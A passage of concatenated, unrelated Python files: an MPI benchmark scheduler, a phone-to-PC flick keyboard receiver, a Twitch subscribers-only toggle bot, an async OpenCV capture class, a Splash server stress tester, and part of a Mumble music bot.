# create hostfile
task_name = task['name']
task_algo = task['algorithm']
task_core = task['cores']
hostfilename = "{name}_{core}_{algo}.hostfile".format(
name=task_name,
core=task_core,
algo=task_algo
)
hostfile_path = os.path.join(hostfile_dir, hostfilename)
# slot_dict = generate_hostfile(task_core, hostfile_path, cpu_resource_remain)
slot_dict = generate_rankfile(task_core, hostfile_path, cpu_resource_remain)
# generate command list
command_list = []
for repeat_times in range(task['repeat']):
output_filename = "{name}_{core}_{algo}_{repeat}.dot".format(
name=task_name,
core=task_core,
algo=task_algo,
repeat=repeat_times
)
output_filepath = os.path.join(output_dir, output_filename)
timer_filename = "{name}_{core}_{algo}_{repeat}.timer".format(
name=task_name,
core=task_core,
algo=task_algo,
repeat=repeat_times
)
timer_filepath = os.path.join(output_dir, timer_filename)
command = """mpirun -np {cores} \
-rf {hostfile} \
-x MXM_RDMA_PORTS=mlx5_0:1 \
-mca btl_openib_if_include mlx5_0:1 \
-x UCX_NET_DEVICES=mlx5_0:1 \
{ramble} -f {input} -n {n} -m {m} {flag} -s {sep} -o {output} -a {algo} -r --warmup --hostnames""".format(
cores=task_core,
hostfile=hostfile_path,
ramble=ramble_binary,
input=task['input'],
n=task['n'],
m=task['m'],
flag=task['flags'],
sep=task['sep'],
output=output_filepath,
algo=task_algo
)
command_list.append((command, timer_filepath))
return slot_dict, command_list
def get_runtime(action, output, required=True):
float_pattern = r'((?:(?:\d*\.\d+)|(?:\d+\.?))(?:[Ee][+-]?\d+)?)'
pattern = 'Time taken in %s: %s' % (action, float_pattern)
match = search(pattern, output)
if required:
return float(match.group(1))
else:
return float(match.group(1) if match is not None else 0)
def parse_runtimes(process, result_path):
output = ''
for line in iter(process.stdout.readline, b''):
line = line.decode('utf-8')
output += line
# write into result file
with open(result_path, 'w') as f:
# print(output)
f.write(output)
# optional runtimes
warmup = get_runtime('warming up MPI', output, required=False)
redistributing = get_runtime('redistributing', output, required=False)
blankets = get_runtime('getting the blankets', output, required=False)
symmetry = get_runtime('symmetry correcting the blankets', output, required=False)
sync = get_runtime('synchronizing the blankets', output, required=False)
neighbors = get_runtime('getting the neighbors', output, required=False)
direction = get_runtime('directing the edges', output, required=False)
gsquare = get_runtime('G-square computations', output, required=False)
mxx = get_runtime('mxx calls', output, required=False)
# required runtimes
reading = get_runtime('reading the file', output, required=True)
network = get_runtime('getting the network', output, required=True)
writing = get_runtime('writing the network', output, required=True)
return [warmup, reading, redistributing, blankets, symmetry, sync, neighbors, direction, mxx, gsquare, network,
writing]
def run_task(task: dict, cpu_resource_remain):
slot_dict, command_list = generate_command(task, cpu_resource_remain)
d = {"status": 'success', 'method': 'allocate'}
logger.info("allocate {} cores successfully".format(task["cores"]), extra=d)
result_list = []
for command, result_path in command_list:
d = {"status": 'process', 'method': 'running'}
logger.info("start {} cores of {}".format(task["cores"], task["name"]), extra=d)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
timer_list = parse_runtimes(process, result_path)
d = {"status": 'success', 'method': 'running'}
logger.info("success {} cores of {}".format(task["cores"], task["name"]), extra=d)
result_list.append(timer_list)
finish_compute(slot_dict, cpu_resource_remain)
result_list_np = np.array(result_list)
timer_filename = "{name}_{core}_{algo}_average.timer".format(
name=task["name"],
core=task["cores"],
algo=task["algorithm"]
)
timer_filepath = os.path.join(output_dir, timer_filename)
average_result = np.average(result_list_np, axis=0)
average_res = {
"warmup": average_result[0],
"reading": average_result[1],
"redistributing": average_result[2],
"blankets": average_result[3],
"symmetry": average_result[4],
"sync": average_result[5],
"neighbors": average_result[6],
"direction": average_result[7],
"mxx": average_result[8],
"gsquare": average_result[9],
"network": average_result[10],
"writing": average_result[11],
}
with open(timer_filepath, 'w') as f:
json.dump(average_res, f)
if __name__ == '__main__':
manager = mp.Manager()
cpu_resource_remain = manager.dict()
cpu_resource_remain["hpc-cluster-node-1"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-2"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-3"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-4"] = set(range(4, 36))
task_list = read_task_from_file("tasks.json")
for task in task_list:
task_queue.push(task, task['level'])
now_task = task_queue.pop()
while not task_queue.isEmpty():
if can_allocate(now_task["cores"], cpu_resource_remain):
d = {"status": 'success', 'method': 'allocate'}
logger.info("{} cores can be allocated".format(now_task["cores"]), extra=d)
mp.Process(target=run_task, args=(now_task, cpu_resource_remain)).start()
now_task = task_queue.pop()
time.sleep(60)
|
flick_kb_receiver.py
|
"""
フリックキーボード(受信側)
PC用
"""
import sys
import time
import socket
import pyautogui
import pyperclip
import threading
def type_text(text):
# 与えた文字を入力(クリップボードにコピー&ペースト)
pyperclip.copy(text)
pyautogui.hotkey("ctrl", "v")
return True
def type_backspace():
pyautogui.typewrite(["backspace"])
return True
def type_enter():
pyautogui.typewrite(["enter"])
return True
class Receiver():
def __init__(self, port, ipaddr=None, set_daemon=True):
"""
受信側
Parameters
----------
port : int
使用するポート番号
ipaddr : None or str
受信側PCのIPアドレス.Noneで自動取得.
set_daemon : bool
スレッドをデーモン化するか.受信部スレッド終了を待たずにメインスレッドを停止させる.
"""
if(ipaddr is None):
host = socket.gethostname()
ipaddr = socket.gethostbyname(host)
self.ipaddr = ipaddr
self.port = port
self.set_daemon = set_daemon
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.loopflag = False
print("ip:{0} port:{1}".format(self.ipaddr, self.port))
def loop(self):
self.sock.settimeout(0.5)
self.sock.bind((self.ipaddr, self.port))
self.sock.listen(1)
print("start listening...")
while(self.loopflag):
try:
conn, addr = self.sock.accept()
except socket.timeout:
continue
print("accepted")
with conn:
while(self.loopflag):
# print("waiting...")
data = conn.recv(1024)
if(not data):
break
if(data[:1]==b"\x08"): # 連続してbackspaceを押すと,複数個同時に送られてくる(例:b"\x08\x08\x08)ことがあるため,先頭8バイトのみチェック
print("> BS")
type_backspace()
elif(data==b"\x0a"):
print("> Enter")
type_enter()
elif(data==b"\x00"):
print("STOP CLIENT")
break
else:
text = data.decode("utf-8")
print(">", text)
type_text(text)
def start_loop(self):
self.loopflag = True
self.thread = threading.Thread(target=self.loop)
if(self.set_daemon):
self.thread.setDaemon(True)
self.thread.start()
print("start_thread")
def stop_loop(self):
print("stop loop")
self.loopflag = False
time.sleep(0.6) # socketがtimeoutするまで待つ
if(not self.set_daemon):
print("waiting to stop client...") # 送信側が停止するのを待つ
self.thread.join()
print("stop_thread")
def close_sock(self):
self.sock.close()
print("socket closed")
def main():
"""
ポート番号を設定し,送信(スマホ)側と合わせる
実行中,コンソールに"s"を入力し,Enterを押すと受信(PC)側を停止できる.
"""
# コマンドライン引数
ipaddr = None
args = sys.argv
if(len(args)<=1):
print("Usage: flick_kb_receiver [PORT] [IP (optional)]")
sys.exit()
elif(len(args)==2):
port = int(args[1])
else:
port = int(args[1])
ipaddr = args[2]
# メイン処理
receiver = Receiver(port=port, ipaddr=ipaddr)
receiver.start_loop()
while True:
stopper = input()
if(stopper=="s"):
receiver.stop_loop()
break
receiver.close_sock()
if __name__=="__main__":
main()
|
subonly.py
|
"""
Copyright 2021 Ashe Muller
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import requests
import time
from threading import Thread
import json
from websocket import create_connection
class oauthToken:
def __init__(self):
self.credentials = json.load(open('credentials.json'))
def getToken(self):
r = requests.post(f"https://id.twitch.tv/oauth2/token?client_id={self.credentials['id']}&client_secret={self.credentials['secret']}&grant_type=client_credentials")
return f"Bearer {r.json()['access_token']}"
with open('users.json', 'r') as f:
users = json.load(f)['users']
credentials = json.load(open('credentials.json'))
cid = credentials['id']
secret = credentials['secret']
o = oauthToken()
api = o.getToken()
irc = credentials['irc']
def emotesOnly(status, username):
ws = create_connection('wss://irc-ws.chat.twitch.tv')
ws.send(f'PASS {irc}')
ws.send(f'NICK hateraidsbgone')
ws.send(f'JOIN #{username}')
if status == 1:
print(f'turning subscribers-only on for user {username}')
ws.send(f"PRIVMSG #{username} :/subscribers")
else:
print(f'turning subscribers-only off for user {username}')
ws.send(f"PRIVMSG #{username} :/subscribersoff")
ws.close()
def channelLive(username):
global api
global cid
headers = {'Accept': 'application/vnd.twitchtv.v5+json', "Client-Id": cid, "Authorization": api}
r = requests.get(f'https://api.twitch.tv/helix/streams?user_login={username}', headers=headers).json()
if r['data'] == []:
return False
else:
return True
loopJson = {}
def mainLoopThread(item):
global loopJson
if channelLive(item) == False and loopJson[item] != True:
loopJson[item] = True
emotesOnly(1, item)
elif channelLive(item) == True and loopJson[item] != False:
loopJson[item] = False
emotesOnly(0, item)
def mainLoop(users=[]):
global loopJson
for item in users:
loopJson[item] = None
while True:
for item in users:
th = Thread(target=mainLoopThread, args=(item,))
th.start()
time.sleep(2.5)
Thread(target=mainLoop, args=(users,)).start()
|
videocaptureasync.py
|
# https://github.com/gilbertfrancois/video-capture-async
import threading
import cv2
import time
WARMUP_TIMEOUT = 10.0
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
if not self.cap.isOpened():
raise RuntimeError("Cannot open camera")
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def isOpened(self):
return self.cap.isOpened()
def start(self):
if self.started:
print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=(), daemon=True)
self.thread.start()
# (warmup) wait for the first successfully grabbed frame
warmup_start_time = time.time()
while not self.grabbed:
warmup_elapsed_time = (time.time() - warmup_start_time)
if warmup_elapsed_time > WARMUP_TIMEOUT:
raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.")
time.sleep(0.5)
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
while True:
try:
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
except AttributeError:
continue
break
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
|
stress.py
|
import sys, random, optparse, time, json
from itertools import islice
from threading import Thread
from collections import Counter
from queue import Queue
import requests
from .utils import SplashServer, MockServer
class StressTest():
def __init__(self, reqs, host="localhost:8050", requests=1000, concurrency=50, shuffle=False, verbose=False):
self.reqs = reqs
self.host = host
self.requests = requests
self.concurrency = concurrency
self.shuffle = shuffle
self.verbose = verbose
def run(self):
args = list(islice(self.reqs, self.requests))
if self.shuffle:
random.shuffle(args)
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
starttime = time.time()
q, p = Queue(), Queue()
for _ in range(self.concurrency):
t = Thread(target=worker, args=(self.host, q, p, self.verbose))
t.daemon = True
t.start()
for a in args:
q.put(a)
q.join()
outputs = []
for _ in range(self.requests):
outputs.append(p.get())
elapsed = time.time() - starttime
print()
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
print("Elapsed time : %.3fs" % elapsed)
print("Avg time p/req: %.3fs" % (elapsed/len(args)))
print("Received (per status code or error):")
for c, n in Counter(outputs).items():
print(" %s: %d" % (c, n))
def worker(host, q, p, verbose=False):
url = "http://%s/render.html" % host
while True:
try:
args = q.get()
t = time.time()
r = requests.get(url, params=args)
t = time.time() - t
p.put(r.status_code)
if verbose:
print(". %d %.3fs %s" % (r.status_code, t, args))
else:
sys.stdout.write(".")
sys.stdout.flush()
except Exception as e:
p.put(type(e))
if verbose:
print("E %.3fs %s" % (t, args))
else:
sys.stdout.write("E")
sys.stdout.flush()
finally:
q.task_done()
class MockArgs(object):
ok_urls = 0.5
error_urls = 0.3
timeout_urls = 0.2
def __init__(self, requests=1000):
self.requests = requests
def _ok_urls(self):
url = ["http://localhost:8998/jsrender"]
return int(self.requests * self.ok_urls) * url
def _error_urls(self):
url = ["http://non-existent-host/"]
return int(self.requests * self.error_urls) * url
def _timeout_urls(self):
url = ["http://localhost:8998/delay?n=10&timeout=0.5"]
return int(self.requests * self.timeout_urls) * url
def __iter__(self):
ok_urls = self._ok_urls()
error_urls = self._error_urls()
timeout_urls = self._timeout_urls()
print("Expected codes: HTTP200x%d, HTTP502x%d, HTTP504x%d" % (
len(ok_urls), len(error_urls), len(timeout_urls)))
urls = ok_urls + error_urls + timeout_urls
return ({"url": x} for x in urls)
class ArgsFromUrlFile(object):
def __init__(self, urlfile):
self.urlfile = urlfile
def __iter__(self):
for line in open(self.urlfile):
url = line.rstrip()
if '://' not in url:
url = 'http://' + url
yield {"url": url, "timeout": 60}
class ArgsFromLogfile(object):
def __init__(self, logfile):
self.logfile = logfile
def __iter__(self):
for l in open(self.logfile):
if "[stats]" in l:
d = json.loads(l[33:].rstrip())
yield d['args']
def lua_runonce(script, timeout=60., splash_args=None, **kwargs):
""" Start splash server, execute lua script in it and return the output.
:type script: str
:param script: Script to be executed.
:type timeout: float
:param timeout: Timeout value for the execution request.
:param splash_args: Extra parameters for splash server invocation.
:type kwargs: dict
:param kwargs: Any other parameters are passed as arguments to the request
and will be available via ``splash.args``.
This function also starts a `MockServer`. If `url` kwarg has scheme=mock,
e.g., "mock://jsrender", it will be resolved as a url pointing to
corresponding mock server resource.
"""
if splash_args is None:
splash_args = ['--disable-lua-sandbox',
'--allowed-schemes=file,http,https', ]
with SplashServer(extra_args=splash_args) as s, \
MockServer() as ms:
if kwargs.get('url', '').startswith('mock://'):
kwargs['url'] = ms.url(kwargs['url'][7:])
params = {'lua_source': script}
params.update(kwargs)
resp = requests.get(s.url('execute'), params=params, timeout=timeout)
if resp.ok:
return resp.content
else:
raise RuntimeError(resp.text)
def benchmark_png(url, viewport=None, wait=0.5, render_all=1,
width=None, height=None, nrepeats=3, timeout=60.):
f = """
function main(splash)
local resp, err = splash:go(splash.args.url)
assert(resp, err)
assert(splash:wait(tonumber(splash.args.wait)))
-- if viewport is 'full' it should be set only after waiting
if splash.args.viewport ~= nil and splash.args.viewport ~= "full" then
local w, h = string.match(splash.args.viewport, '^(%d+)x(%d+)')
if w == nil or h == nil then
error('Invalid viewport size format: ' .. splash.args.viewport)
end
splash:set_viewport_size(tonumber(w), tonumber(h))
end
local susage = splash:get_perf_stats()
local nrepeats = tonumber(splash.args.nrepeats)
local render_all = splash.args.render_all or splash.args.viewport == 'full'
local png, err
for i = 1, nrepeats do
png, err = splash:png{width=splash.args.width,
height=splash.args.height,
render_all=render_all}
assert(png, err)
end
local eusage = splash:get_perf_stats()
return {
wallclock_secs=(eusage.walltime - susage.walltime) / nrepeats,
maxrss=eusage.maxrss,
cpu_secs=(eusage.cputime - susage.cputime) / nrepeats,
png=png,
}
end
"""
return json.loads(lua_runonce(
f, url=url, width=width, height=height, render_all=render_all,
nrepeats=nrepeats, wait=wait, viewport=viewport, timeout=timeout))
def parse_opts():
op = optparse.OptionParser()
op.add_option("-H", dest="host", default="localhost:8050",
help="splash hostname & port (default: %default)")
op.add_option("-u", dest="urlfile", metavar="FILE",
help="read urls from FILE instead of using mock server ones")
op.add_option("-l", dest="logfile", metavar="FILE",
help="read urls from splash log file (useful for replaying)")
op.add_option("-s", dest="shuffle", action="store_true", default=False,
help="shuffle (randomize) requests (default: %default)")
op.add_option("-v", dest="verbose", action="store_true", default=False,
help="verbose mode (default: %default)")
op.add_option("-c", dest="concurrency", type="int", default=50,
help="concurrency (default: %default)")
op.add_option("-n", dest="requests", type="int", default=1000,
help="number of requests (default: %default)")
return op.parse_args()
def main():
opts, _ = parse_opts()
if opts.urlfile:
urls = ArgsFromUrlFile(opts.urlfile)
elif opts.logfile:
urls = ArgsFromLogfile(opts.logfile)
else:
urls = MockArgs(opts.requests)
t = StressTest(urls, opts.host, opts.requests, opts.concurrency, opts.shuffle, opts.verbose)
t.run()
if __name__ == "__main__":
main()
|
mumbleBot.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import threading
import time
import sys
import math
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os
import os.path
import pymumble_py3 as pymumble
import pymumble_py3.constants
import variables as var
import logging
import logging.handlers
import traceback
import struct
from packaging import version
import util
import command
import constants
import media.playlist
from constants import tr_cli as tr
from database import SettingsDatabase, MusicDatabase, DatabaseMigration
from media.item import ValidationFailedError, PreparationFailedError
from media.cache import MusicCache
class MumbleBot:
version = 'git'
def __init__(self, args):
self.log = logging.getLogger("bot")
self.log.info(f"bot: botamusique version {self.get_version()}, starting...")
signal.signal(signal.SIGINT, self.ctrl_caught)
self.cmd_handle = {}
self.stereo = var.config.getboolean('bot', 'stereo', fallback=True)
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel", fallback=None)
var.user = args.user
var.is_proxified = var.config.getboolean(
"webinterface", "is_web_proxified")
# Flags to indicate the bot is exiting (Ctrl-C, or !kill)
self.exit = False
self.nb_exit = 0
# Related to ffmpeg thread
self.thread = None
self.thread_stderr = None
self.read_pcm_size = 0
self.pcm_buffer_size = 0
self.last_ffmpeg_err = ""
# Play/pause status
self.is_pause = False
self.pause_at_id = ""
self.playhead = -1 # current position in a song.
self.song_start_at = -1
self.wait_for_ready = False # flag for the loop are waiting for download to complete in the other thread
#
self.on_interrupting = False
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel")
if args.certificate:
certificate = args.certificate
else:
certificate = util.solve_filepath(var.config.get("server", "certificate"))
if args.tokens:
tokens = args.tokens
else:
tokens = var.config.get("server", "tokens")
tokens = tokens.split(',')
if args.bots:
self.bots = set(args.bots)
else:
bots = var.config.get("server", "bots",fallback="")
self.bots = set(bots.split(','))
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
if args.bandwidth:
self.bandwidth = args.bandwidth
else:
self.bandwidth = var.config.getint("bot", "bandwidth")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password, tokens=tokens,
stereo=self.stereo,
debug=var.config.getboolean('debug', 'mumbleConnection'),
certfile=certificate)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_TEXTMESSAGERECEIVED, self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
if self.mumble.connected >= pymumble.constants.PYMUMBLE_CONN_STATE_FAILED:
exit()
self.set_comment()
self.mumble.users.myself.unmute() # by sure the user is not muted
self.join_channel()
self.mumble.set_bandwidth(self.bandwidth)
self._user_in_channel = self.get_user_count_in_channel()
# ====== Volume ======
self.volume_helper = util.VolumeHelper()
_volume = var.config.getfloat('bot', 'volume', fallback=0.8)
if var.db.has_option('bot', 'volume'):
_volume = var.db.getfloat('bot', 'volume')
self.volume_helper.set_volume(_volume)
self.is_ducking = False
self.on_ducking = False
self.ducking_release = time.time()
self.last_volume_cycle_time = time.time()
self._ducking_volume = 0
_ducking_volume = var.config.getfloat("bot", "ducking_volume", fallback=0.50)
_ducking_volume = var.db.getfloat("bot", "ducking_volume", fallback=_ducking_volume)
self.volume_helper.set_ducking_volume(_ducking_volume)
self.ducking_threshold = var.config.getfloat("bot", "ducking_threshold", fallback=5000)
self.ducking_threshold = var.db.getfloat("bot", "ducking_threshold", fallback=self.ducking_threshold)
if not var.db.has_option("bot", "ducking") and var.config.getboolean("bot", "ducking", fallback=False) \
or var.config.getboolean("bot", "ducking"):
self.is_ducking = True
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_SOUNDRECEIVED,
self.ducking_sound_received)
self.mumble.set_receive_sound(True)
assert var.config.get("bot", "when_nobody_in_channel") in ['pause', 'pause_resume', 'stop', 'nothing', ''], \
"Unknown action for when_nobody_in_channel"
if var.config.get("bot", "when_nobody_in_channel", fallback='') in ['pause', 'pause_resume', 'stop']:
user_change_callback = \
lambda user, action: threading.Thread(target=self.users_changed,
args=(user, action), daemon=True).start()
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERREMOVED, user_change_callback)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERUPDATED, user_change_callback)
# Debug use
self._loop_status = 'Idle'
self._display_rms = False
self._max_rms = 0
self.redirect_ffmpeg_log = var.config.getboolean('debug', 'redirect_ffmpeg_log', fallback=True)
if var.config.getboolean("bot", "auto_check_update"):
def check_update():
nonlocal self
new_version, changelog = util.check_update(self.get_version())
if new_version:
self.send_channel_msg(tr('new_version_found', new_version=new_version, changelog=changelog))
th = threading.Thread(target=check_update, name="UpdateThread")
th.daemon = True
th.start()
last_startup_version = var.db.get("bot", "version", fallback=None)
if not last_startup_version or version.parse(last_startup_version) < version.parse(self.version):
var.db.set("bot", "version", self.version)
if var.config.getboolean("bot", "auto_check_update"):
changelog = util.fetch_changelog()
self.send_channel_msg(tr("update_successful", version=self.version, changelog=changelog))
# Set the CTRL+C shortcut
def ctrl_caught(self, signal, frame):
self.log.info(
"\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
if self.nb_exit > 1:
self.log.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
self.exit = True
def get_version(self):
if self.version != "git":
return self.version
else:
return util.get_snapshot_version()
def register_command(self, cmd, handle, no_partial_match=False, access_outside_channel=False, admin=False):
cmds = cmd.split(",")
for command in cmds:
command = command.strip()
if command:
self.cmd_handle[command] = {'handle': handle,
'partial_match': not no_partial_match,
'access_outside_channel': access_outside_channel,
'admin': admin}
self.log.debug("bot: command added: " + command)
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def join_channel(self):
if self.channel:
if '/' in self.channel:
self.mumble.channels.find_by_tree(self.channel.split('/')).move_in()
else:
self.mumble.channels.find_by_name(self.channel).move_in()
# =======================
# Message
# =======================
# All text send to the chat is analysed by this function
def message_received(self, text):
raw_message = text.message.strip()
message = re.sub(r'<.*?>', '', raw_message)
if text.actor == 0:
# Some server will send a welcome message to the bot once connected.
# It doesn't have a valid "actor". Simply ignore it here.
return
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('commands', 'split_username_at_space'):
# in can you use https://github.com/Natenom/mumblemoderator-module-collection/tree/master/os-suffixes ,
# you want to split the username
user = user.split()[0]
command_symbols = var.config.get('commands', 'command_symbol')
match = re.match(fr'^[{re.escape(command_symbols)}](?P<command>\S+)(?:\s(?P<argument>.*))?', message)
if match:
command = match.group("command").lower()
argument = match.group("argument") or ""
if not command:
return
self.log.info(f'bot: received command "{command}" with arguments "{argument}" from {user}')
# Anti stupid guy function
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_text_message(
tr('pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('user_ban'))
return
if not self.is_admin(user) and argument:
input_url = util.get_url_from_input(argument)
if input_url and var.db.has_option('url_ban', input_url):
self.mumble.users[text.actor].send_text_message(
tr('url_ban'))
return
command_exc = ""
try:
if command in self.cmd_handle:
command_exc = command
else:
# try partial match
cmds = self.cmd_handle.keys()
matches = []
for cmd in cmds:
if cmd.startswith(command) and self.cmd_handle[cmd]['partial_match']:
matches.append(cmd)
if len(matches) == 1:
self.log.info("bot: {:s} matches {:s}".format(command, matches[0]))
command_exc = matches[0]
elif len(matches) > 1:
self.mumble.users[text.actor].send_text_message(
tr('which_command', commands="<br>".join(matches)))
return
else:
self.mumble.users[text.actor].send_text_message(
tr('bad_command', command=command))
return
if self.cmd_handle[command_exc]['admin'] and not self.is_admin(user):
self.mumble.users[text.actor].send_text_message(tr('not_admin'))
return
if not self.cmd_handle[command_exc]['access_outside_channel'] \
and not self.is_admin(user) \
and not var.config.getboolean('bot', 'allow_other_channel_message') \
and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_text_message(
tr('not_in_my_channel'))
return
self.cmd_handle[command_exc]['handle'](self, user, text, command_exc, argument)
except:
error_traceback = traceback.format_exc()
error = error_traceback.rstrip().split("\n")[-1]
self.log.error(f"bot: command {command_exc} failed with error: {error_traceback}\n")
self.send_msg(tr('error_executing_command', command=command_exc, error=error), text)
def send_msg(self, msg, text):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
# text if the object message, contain information if direct message or channel message
self.mumble.users[text.actor].send_text_message(msg)
def send_channel_msg(self, msg):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').rstrip().split(';')
if user in list_admin:
return True
else:
return False
# =======================
# Other Mumble Events
# =======================
def get_user_count_in_channel(self):
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
return len(set([user.get_property("name") for user in own_channel.get_users()]).difference(self.bots))
def users_changed(self, user, message):
# only check if there is one more user currently in the channel
# else when the music is paused and somebody joins, music would start playing again
user_count = self.get_user_count_in_channel()
if user_count > self._user_in_channel and user_count == 2:
if var.config.get("bot", "when_nobody_in_channel") == "pause_resume":
self.resume()
elif var.config.get("bot", "when_nobody_in_channel") == "pause" and self.is_pause:
self.send_channel_msg(tr("auto_paused"))
elif user_count == 1 and len(var.playlist) != 0:
# if the bot is the only user left in the channel and the playlist isn't empty
if var.config.get("bot", "when_nobody_in_channel") == "stop":
self.log.info('bot: No user in my channel. Stop music now.')
self.clear()
else:
self.log.info('bot: No user in my channel. Pause music now.')
self.pause()
self._user_in_channel = user_count
# =======================
# Launch and Download
# =======================
def launch_music(self, music_wrapper, start_from=0):
assert music_wrapper.is_ready()
uri = music_wrapper.uri()
self.log.info("bot: play music " + music_wrapper.format_debug_string())
if var.config.getboolean('bot', 'announce_current_music'):
self.send_channel_msg(music_wrapper.format_current_playing())
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
channels = 2 if self.stereo else 1
self.pcm_buffer_size = 960 * channels
command = ("ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i',
uri, '-ss', f"{start_from:f}", '-ac', str(channels), '-f', 's16le', '-ar', '48000', '-')
self.log.debug("bot: execute ffmpeg command: " + " ".join(command))
# The ffmpeg process is a thread
# prepare pipe for catching stderr of ffmpeg
if self.redirect_ffmpeg_log:
pipe_rd, pipe_wd = util.pipe_no_wait() # Let the pipe work in non-blocking mode
self.thread_stderr = os.fdopen(pipe_rd)
else:
pipe_rd, pipe_wd = None, None
self.thread = sp.Popen(command, stdout=sp.PIPE, stderr=pipe_wd, bufsize=self.pcm_buffer_size)
def async_download_next(self):
# Function start if the next music isn't ready
# Do nothing in case the next music is already downloaded
self.log.debug("bot: Async download next asked ")
while var.playlist.next_item():
# usually, all validation will be done when adding to the list.
# however, for performance consideration, youtube playlist won't be validate when added.
# the validation has to be done here.
next = var.playlist.next_item()
try:
if not next.is_ready():
self.async_download(next)
break
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(next.id)
var.cache.free_and_delete(next.id)
def async_download(self, item):
th = threading.Thread(
target=self._download, name="Prepare-" + item.id[:7], args=(item,))
self.log.info(f"bot: start preparing item in thread: {item.format_debug_string()}")
th.daemon = True
th.start()
return th
def start_download(self, item):
if not item.is_ready():
self.log.info("bot: current music isn't ready, start downloading.")
self.async_download(item)
self.send_channel_msg(
tr('download_in_progress', item=item.format_title()))
def _download(self, item):
ver = item.version
try:
item.validate()
if item.is_ready():
return True
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(item.id)
var.cache.free_and_delete(item.id)
return False
try:
item.prepare()
if item.version > ver:
var.playlist.version += 1
return True
except PreparationFailedError as e:
self.send_channel_msg(e.msg)
return False
# =======================
# Loop
# =======================
# Main loop of the Bot
def loop(self):
while not self.exit and self.mumble.is_alive():
while self.thread and self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
# If the buffer isn't empty, I cannot send new music part, so I wait
self._loop_status = f'Wait for buffer {self.mumble.sound_output.get_buffer_size():.3f}'
time.sleep(0.01)
raw_music = None
if self.thread:
# I get raw from ffmpeg thread
# move playhead forward
self._loop_status = 'Reading raw'
if self.song_start_at == -1:
self.song_start_at = time.time() - self.playhead
self.playhead = time.time() - self.song_start_at
raw_music = self.thread.stdout.read(self.pcm_buffer_size)
self.read_pcm_size += len(raw_music)
if self.redirect_ffmpeg_log:
try:
self.last_ffmpeg_err = self.thread_stderr.readline()
if self.last_ffmpeg_err:
self.log.debug("ffmpeg: " + self.last_ffmpeg_err.strip("\n"))
except:
pass
if raw_music:
# Adjust the volume and send it to mumble
self.volume_cycle()
if not self.on_interrupting and len(raw_music) == self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(raw_music, 2, self.volume_helper.real_volume))
elif self.read_pcm_size == 0:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=True), 2, self.volume_helper.real_volume))
